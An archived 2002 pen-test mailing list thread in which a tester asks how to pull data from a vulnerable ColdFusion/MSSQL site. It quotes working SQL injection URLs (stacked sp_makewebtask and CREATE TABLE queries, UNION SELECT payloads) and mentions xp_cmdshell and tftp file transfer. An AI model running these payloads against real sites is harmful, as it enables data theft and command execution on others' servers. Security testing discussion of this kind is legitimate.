Re: SQL INJECTION IN Coldfusion
From: wirepair (wirepair@roguemail.net)Date: 09/17/02
- Previous message: Kevin Spett: "Re: Application & Iplanet/Apache web server vulnerability and penetration testing"
- In reply to: Cesar: "Re: SQL INJECTION IN Coldfusion"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "wirepair" <wirepair@roguemail.net> To: Cesar <cesarc56@yahoo.com>, Mr Ro <vnmrro@yahoo.com>, pen-test@securityfocus.com Date: Tue, 17 Sep 2002 06:59:55 -0700
you may also want to try:
UNION file.cfm?id=4567 UNION SELECT TOP 3 FROM mrro--
or 4 if it is four lines ect.
On Fri, 13 Sep 2002 19:04:37 -0700 (PDT)
Cesar <cesarc56@yahoo.com> wrote:
>Hi.
>You must use UNION ALL to get all the rows.
>
>For new techniques take a look a this paper:
>
>Manipulating MS Sql Server using sql injection.
>http://www.appsecinc.com/news/briefing.html#inject
>
>Cesar.
>
>--- Mr Ro <vnmrro@yahoo.com> wrote:
>> hello pen-tester,
>> I am dealing with a pen-test agains a CFM server
>> with
>> MSSQL as backend. It is vulnerable with direct SQL
>> injection.
>> I figure out that I can create,drop...table, execute
>> xp_cmdshell, sp_makewebtask, so i submit:
>> submit:
>> http://mysite/file.cfm?id=4546;exec sp_makewebtask
>> "C:\winnt\temp\blah.htm","select * from
>> master..sysmessages"--
>> it's okay, and I want to get
>> "C:\winnt\temp\blah.htm".
>> I submit:
>> http://mysite/file.cfm?id=4567;create table blah
>> (line
>> varchar(8000))--
>> and then, I submit:
>> http://mysite/file.cfm?id=4567 UNION SELECT line
>> from
>> mrro--
>> it returns an error complain that "All queries in an
>> SQL statement containing a UNION operator must have
>> an
>> equal number of expressions in their target lists."
>> so
>> I keep adding "line" in my request url
>> (http://mysite/file.cfm?id=4567 UNION SELECT
>> line,line,line from mrro--), finally it returns an
>> error message like this:
>> "[Microsoft][ODBC SQL Server Driver][SQL Server]The
>> text, ntext, or image data type cannot be selected
>> as
>> DISTINCT."
>> question here: who can explain me what happened ?
>>
>> I know there is another way to download or upload
>> files using "tftp", so is there any free "tftp"
>> server
>> for me to use instead of installing a new one ?
>> thank for reading.
>> best regards
>> mrro
>>
>> __________________________________________________
>> Do you Yahoo!?
>> Yahoo! News - Today's headlines
>> http://news.yahoo.com
>>
>>
>----------------------------------------------------------------------------
>> This list is provided by the SecurityFocus Security
>> Intelligence Alert (SIA)
>> Service. For more information on SecurityFocus' SIA
>> service which
>> automatically alerts you to the latest security
>> vulnerabilities please see:
>> https://alerts.securityfocus.com/
>>
>
>
>__________________________________________________
>Do you Yahoo!?
>Yahoo! News - Today's headlines
>http://news.yahoo.com
>
>----------------------------------------------------------------------------
>This list is provided by the SecurityFocus Security
>Intelligence Alert (SIA)
>Service. For more information on SecurityFocus' SIA
>service which
>automatically alerts you to the latest security
>vulnerabilities please see:
>https://alerts.securityfocus.com/
>
_____________________________
For the best comics, toys, movies, and more,
please visit <http://www.tfaw.com/?qt=wmf>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Previous message: Kevin Spett: "Re: Application & Iplanet/Apache web server vulnerability and penetration testing"
- In reply to: Cesar: "Re: SQL INJECTION IN Coldfusion"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
